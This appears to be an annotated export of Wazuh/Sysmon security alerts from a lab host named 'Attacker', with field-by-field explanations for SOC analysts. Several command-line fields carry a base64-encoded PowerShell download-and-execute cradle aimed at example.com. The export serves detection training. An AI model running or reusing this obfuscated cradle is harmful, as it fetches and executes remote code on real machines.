data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:11.448+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:11.448+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  145
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535431.2985635
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:09.0424583Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351175
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:08.997 ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ProcessId: 16876 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0oi5rz3g.woj.ps1 CreationUtcTime: 2025-04-24 22:57:08.995 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:08.997
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0oi5rz3g.woj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:08.995
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:13.800+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:13.800+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  142
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535433.2988404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:11.4950021Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351211
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:10.231 ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00} ProcessId: 8744 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ParentProcessId: 16876 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:10.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c6-680a-160d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8744
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:13.816+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:13.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  146
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535433.2996471
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:11.7142281Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351212
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:11.664 ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00} ProcessId: 8744 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5j1irpdl.sgx.ps1 CreationUtcTime: 2025-04-24 22:57:11.664 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:11.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c6-680a-160d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8744
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5j1irpdl.sgx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:11.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions